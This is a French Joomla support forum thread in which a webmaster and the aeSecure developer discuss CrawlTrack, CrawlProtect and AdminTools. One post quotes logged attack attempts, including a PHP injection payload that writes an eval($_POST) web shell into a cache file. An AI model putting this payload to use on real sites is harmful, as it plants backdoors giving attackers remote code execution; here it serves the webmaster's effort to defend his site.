×
Pour discuter des articles publiés sur le site.
Question [sécurité] Crawltrack et Joomla : Une sécurité et des statistiques
01 Mai 2016 22:53 #7
par cavo789
Christophe
Développeur d'aeSecure; suite de protection et d'optimisation de sites web Apache - www.aesecure.com
Votre site a été hacké ? Quelques conseils : www.aesecure.com/fr/blog/site-hacke.html
www.aesecure.com/fr/blog/joomla-securite.html
Réponse de cavo789 sur le sujet [sécurité] Crawltrack et Joomla : Une sécurité et des statistiques
Bonjour Scottux
Le logiciel CrawlProtect ne semble en effet plus mis-à-jour (dernière màj début novembre 2013).
Pour aeSecure, pourrais-tu me donner plus d'info s'il te plaît ? Je bloque des URLs qui contiennent des attaques, quel serait l'URL qui, selon toi, aurait dû être bloquée et qui ne l'a pas été ? Ainsi, je pourrais comprendre, te répondre plus précisément et en cas de besoin, ajuster la protection offerte par aeSecure.
Pour tes autres question :
1. CrawlTrack est selon moi un logiciel de suivi; pas un parefeu (ne pas confondre avec CrawlProtect; du même auteur)
2. Si on parle de CrawlProtect, je suggère de ne pas l'utiliser en même temps qu'aeSecure et/ou AdminTools voire tout autre : comme sur ton ordinateur Scottux; tu as je pense un seul antivirus pour éviter que l'un entre en conflit avec l'autre; idem pour les solutions parefeu. Fais un choix et désinstalle les autres au besoin.
3. Tout qui est bloqué par aeSecure se trouve mentionné dans le fichier /aesecure/logs/access_denied.php. Tu as aussi accès à cette information depuis aeSecure, dans le menu Outils -> Log des accès bloqués.
4. Voir réponse 2. ci-dessus. Pour le "me conseillez-vous"; je sors mon jocker
Bonne soirée.
Le logiciel CrawlProtect ne semble en effet plus mis-à-jour (dernière màj début novembre 2013).
Pour aeSecure, pourrais-tu me donner plus d'info s'il te plaît ? Je bloque des URLs qui contiennent des attaques, quel serait l'URL qui, selon toi, aurait dû être bloquée et qui ne l'a pas été ? Ainsi, je pourrais comprendre, te répondre plus précisément et en cas de besoin, ajuster la protection offerte par aeSecure.
Pour tes autres question :
1. CrawlTrack est selon moi un logiciel de suivi; pas un parefeu (ne pas confondre avec CrawlProtect; du même auteur)
2. Si on parle de CrawlProtect, je suggère de ne pas l'utiliser en même temps qu'aeSecure et/ou AdminTools voire tout autre : comme sur ton ordinateur Scottux; tu as je pense un seul antivirus pour éviter que l'un entre en conflit avec l'autre; idem pour les solutions parefeu. Fais un choix et désinstalle les autres au besoin.
3. Tout qui est bloqué par aeSecure se trouve mentionné dans le fichier /aesecure/logs/access_denied.php. Tu as aussi accès à cette information depuis aeSecure, dans le menu Outils -> Log des accès bloqués.
4. Voir réponse 2. ci-dessus. Pour le "me conseillez-vous"; je sors mon jocker
Bonne soirée.
Christophe
Développeur d'aeSecure; suite de protection et d'optimisation de sites web Apache - www.aesecure.com
Votre site a été hacké ? Quelques conseils : www.aesecure.com/fr/blog/site-hacke.html
www.aesecure.com/fr/blog/joomla-securite.html
Connectez-vous ou Créer un compte pour participer à la conversation.
02 Mai 2016 10:57 - 02 Mai 2016 10:58 #8
par Scottux
Pas de support en MP sans y être invité.Merci
Merci de vous conformer aux règles du forum.
Réponse de Scottux sur le sujet [sécurité] Crawltrack et Joomla : Une sécurité et des statistiques
Bonjour cavo et merci pour ta réponse.
C'est bien Crawltrack que j'utilise et pas Crawlprotect. J'ai enlevé Crawlprotect depuis longtemps car il me causait trop de soucis sur mon site.
Crawptrack me signale presque tous les jours des attaques par "injection de codes" mais il ne me donne pas les détails de ces attaques. Je ne peux donc pas te donner plus d'informations sur celles-ci. Je ne sais pas s'il y a un moyen de trouver les détails non-affichés des dernières attaques bloquées par Crawltrack.
D'après le panneau d'admin de Crawltrack, les détails des attaques ne semblent pas être automatiquement sauvegardées. Voilà ce que ça me donne pour la semaine passée.
Si je fais une recherche des attaques sur une période plus longue (Avant install de aeSecure), Crawltrack me sort quelques détails, comme par exemple :Ou encore :Ou encore :Le plus souvent, c'est quand même les attaques cprotect=
Je suppose que ça vise Crawlprotect. Pourtant Crawlprotect n'est plus installé sur mon site. Dans les Logs des accès bloqués de aesecure, je ne trouve rien qui concerne cprotect.
Dans ta réponse, tu me parles aussi de AdminTools. Faut il obligatoirement que je désinstalle AdminTools si je décide de conserver aeSecure sur mon site ?
C'est bien Crawltrack que j'utilise et pas Crawlprotect. J'ai enlevé Crawlprotect depuis longtemps car il me causait trop de soucis sur mon site.
Crawptrack me signale presque tous les jours des attaques par "injection de codes" mais il ne me donne pas les détails de ces attaques. Je ne peux donc pas te donner plus d'informations sur celles-ci. Je ne sais pas s'il y a un moyen de trouver les détails non-affichés des dernières attaques bloquées par Crawltrack.
D'après le panneau d'admin de Crawltrack, les détails des attaques ne semblent pas être automatiquement sauvegardées. Voilà ce que ça me donne pour la semaine passée.
Si je fais une recherche des attaques sur une période plus longue (Avant install de aeSecure), Crawltrack me sort quelques détails, comme par exemple :
Vous pouvez être exposé si vous utilisez un de ces scripts:
?
Paramètres utilisés pour les tentatives d'injection de code:
cprotect=
Fichier/script que le hacker a tenté d'injecter:
2?http://mon-site.com/forum/83-les-apprentis?cprotect
Url demandées:
/forum/83-les-apprentis?cprotect=2?http://mon-site.com/forum/83-les-apprentis?cprotect=2Vous pouvez être exposé si vous utilisez un de ces scripts:
Coppermine Photo Gallery
?
Paramètres utilisés pour les tentatives d'injection de code:
board_url=
referer=
Fichier/script que le hacker a tenté d'injecter:
http://mon-site.com/es/forum
http://mon-site.com
Url demandées:
/mobiquo/smartbanner/welcome.php?referer=http%3A%2F%2Fmon-site.com%2Fes%2Ffo
rum&code=&board_url=http%3A%2F%2Fmon-site.com&lang=enVous pouvez être exposé si vous utilisez un de ces scripts:
?
Paramètres utilisés pour les tentatives d'injection de code:
1=
Fichier/script que le hacker a tenté d'injecter:
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime
(0);echo '->|';file_put_contents(dirname($_SERVER['SCRIPT_FILENAME']).'/cac
he/cachee.php','<?php eval($_POST[1]);?>');echo '|<-';
@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime
(0);echo '->|';file_put_contents(dirname($_SERVER['SCRIPT_FILENAME']).'/cac
he/cachee.php','<?php eval($_POST[shine]);?>');echo '|<-';
Url demandées:
//?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes
_runtime(0);echo%20'-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENA
ME'%5D).'/cache/cachee.php','%3C?php%20eval($_POST%5B1%5D);?%3E');echo%20'%7C%3C
-';
--------------------------------------------------------------------------------------------
//?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes
_runtime(0);echo%20'-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENA
ME'%5D).'/cache/cachee.php','%3C?php%20eval($_POST%5Bshine%5D);?%3E');echo%20'%7
C%3C-';Je suppose que ça vise Crawlprotect. Pourtant Crawlprotect n'est plus installé sur mon site. Dans les Logs des accès bloqués de aesecure, je ne trouve rien qui concerne cprotect.
Dans ta réponse, tu me parles aussi de AdminTools. Faut il obligatoirement que je désinstalle AdminTools si je décide de conserver aeSecure sur mon site ?
Pas de support en MP sans y être invité.Merci
Merci de vous conformer aux règles du forum.
Connectez-vous ou Créer un compte pour participer à la conversation.
02 Mai 2016 11:53 #9
par cavo789
Christophe
Développeur d'aeSecure; suite de protection et d'optimisation de sites web Apache - www.aesecure.com
Votre site a été hacké ? Quelques conseils : www.aesecure.com/fr/blog/site-hacke.html
www.aesecure.com/fr/blog/joomla-securite.html
Réponse de cavo789 sur le sujet [sécurité] Crawltrack et Joomla : Une sécurité et des statistiques
Salut Scottux
Pour CrawlTract/Protect; je dirais : passons notre chemin. CP n'étant pas installé sur ton site, c'est donc "juste" CT qui est là pour des statistiques et non pour une protection du site. CT n'est plus mis à jour depuis novembre 2011.
Pour AdminTools, le risque d'avoir deux (ou plus) d'antivirus / parefeu, c'est les collusions. AT pourrait détecter certains paramètres d'aeSecure comme potentiellement dangereux et vice-versa. C'est une remarque théorique; cela pourrait arriver.
Si tu te sens bien avec AT, tu peux le garder; pas de souci, c'est un composant suivi et proposant une sécurisation forte.
aeSecure et AT se positionnent un peu différément; avec des avantages de part et d'autres; à toi de faire un choix
Maintenant, oui, tu pourrais très bien garder les deux jusqu'à la première rencontre d'un conflit et à ce moment-là décider de ce que tu fais. Le choix t'appartient.
Bonne journée.
Pour CrawlTract/Protect; je dirais : passons notre chemin. CP n'étant pas installé sur ton site, c'est donc "juste" CT qui est là pour des statistiques et non pour une protection du site. CT n'est plus mis à jour depuis novembre 2011.
Pour AdminTools, le risque d'avoir deux (ou plus) d'antivirus / parefeu, c'est les collusions. AT pourrait détecter certains paramètres d'aeSecure comme potentiellement dangereux et vice-versa. C'est une remarque théorique; cela pourrait arriver.
Si tu te sens bien avec AT, tu peux le garder; pas de souci, c'est un composant suivi et proposant une sécurisation forte.
aeSecure et AT se positionnent un peu différément; avec des avantages de part et d'autres; à toi de faire un choix
Maintenant, oui, tu pourrais très bien garder les deux jusqu'à la première rencontre d'un conflit et à ce moment-là décider de ce que tu fais. Le choix t'appartient.
Bonne journée.
Christophe
Développeur d'aeSecure; suite de protection et d'optimisation de sites web Apache - www.aesecure.com
Votre site a été hacké ? Quelques conseils : www.aesecure.com/fr/blog/site-hacke.html
www.aesecure.com/fr/blog/joomla-securite.html
Connectez-vous ou Créer un compte pour participer à la conversation.
02 Mai 2016 12:36 #10
par Scottux
Pas de support en MP sans y être invité.Merci
Merci de vous conformer aux règles du forum.
Réponse de Scottux sur le sujet [sécurité] Crawltrack et Joomla : Une sécurité et des statistiques
OK. Merci pour les précisions.
Je vais donc enlever Crawltrack de mon site et conserver pour l'instant aeSecure et AdminTools. Si je constate des conflits, je ferai ensuite un choix.
aeSecure semble vraiment très bien et ne perturbe pas la navigation sur mon site depuis qu'il est installé. L'interface est également très réussie et simple à comprendre.
Tu as fait du bon travail.
Je vais donc enlever Crawltrack de mon site et conserver pour l'instant aeSecure et AdminTools. Si je constate des conflits, je ferai ensuite un choix.
aeSecure semble vraiment très bien et ne perturbe pas la navigation sur mon site depuis qu'il est installé. L'interface est également très réussie et simple à comprendre.
Tu as fait du bon travail.
Pas de support en MP sans y être invité.Merci
Merci de vous conformer aux règles du forum.
Connectez-vous ou Créer un compte pour participer à la conversation.
02 Mai 2016 18:53 #12
par Scottux
Pas de support en MP sans y être invité.Merci
Merci de vous conformer aux règles du forum.
Réponse de Scottux sur le sujet [sécurité] Crawltrack et Joomla : Une sécurité et des statistiques
Bonjour Jean-François et merci pour tes précisions,
J'utilise la version gratuite de AdminTools uniquement pour vérifier et modifier certaines permissions sur les fichiers. Je trouve ça plus pratique qu'avec Filezilla. Je ne génère pas mon htaccess avec AdminTools.
Pour le référencement, je m'en fous un peu car mon site fonctionne plus avec le bouche à oreille qu'avec google. C'est une petite communauté pour une passion qui ne comporte pas beaucoup de passionnés dans le monde. Je n'ai même pas réalisé un fichier du plan de mon site, c'est pour dire.
Au niveau de mes extensions, je me contente de celles qui me sont vraiment utiles et je n'en ai pas beaucoup.
Par curiosité, j'avais aussi testé mon site avec Gtmetrix et c'était assez correct.
Le plus important pour moi est de sécuriser au mieux mon site, avec mes faibles connaissances, afin de ne pas perdre son contenu. C'est quand même 10 années de travail.
J'utilise la version gratuite de AdminTools uniquement pour vérifier et modifier certaines permissions sur les fichiers. Je trouve ça plus pratique qu'avec Filezilla. Je ne génère pas mon htaccess avec AdminTools.
Pour le référencement, je m'en fous un peu car mon site fonctionne plus avec le bouche à oreille qu'avec google. C'est une petite communauté pour une passion qui ne comporte pas beaucoup de passionnés dans le monde. Je n'ai même pas réalisé un fichier du plan de mon site, c'est pour dire.
Au niveau de mes extensions, je me contente de celles qui me sont vraiment utiles et je n'en ai pas beaucoup.
Par curiosité, j'avais aussi testé mon site avec Gtmetrix et c'était assez correct.
Le plus important pour moi est de sécuriser au mieux mon site, avec mes faibles connaissances, afin de ne pas perdre son contenu. C'est quand même 10 années de travail.
Pas de support en MP sans y être invité.Merci
Merci de vous conformer aux règles du forum.
Connectez-vous ou Créer un compte pour participer à la conversation.
Droit d'accès du forum
- Vous ne pouvez pas: Créer un nouveau sujet.
- Vous ne pouvez pas: Répondre au sujet.
- Vous ne pouvez pas: Éditer votre message.
Modérateurs: lavsteph, tramber91, Scottux, serge, starter
Temps de génération de la page : 0.197 secondes